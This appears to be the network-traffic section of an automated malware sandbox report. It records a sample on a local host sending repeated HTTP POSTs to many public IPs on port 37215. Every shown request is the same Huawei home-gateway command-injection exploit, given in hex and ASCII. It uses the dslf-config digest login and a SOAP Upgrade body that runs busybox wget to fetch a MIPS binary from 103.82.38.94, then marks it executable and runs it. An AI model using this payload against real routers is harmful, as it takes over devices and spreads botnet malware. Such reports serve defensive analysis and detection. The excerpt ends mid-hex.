                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        110192.168.2.145213641.200.53.4737215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093756914 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        111192.168.2.144175641.215.251.11537215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093786955 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        112192.168.2.1437254156.28.204.12537215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093816042 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        113192.168.2.1448458156.161.214.10937215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093853951 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        114192.168.2.143483441.74.218.6937215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093868017 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        115192.168.2.1451916197.214.25.24437215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093899012 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        116192.168.2.145834041.30.140.22937215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093919992 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        117192.168.2.144722041.11.9.16037215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093956947 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        118192.168.2.1433304156.33.213.3537215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093976021 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        119192.168.2.143310041.164.167.6437215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.094003916 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 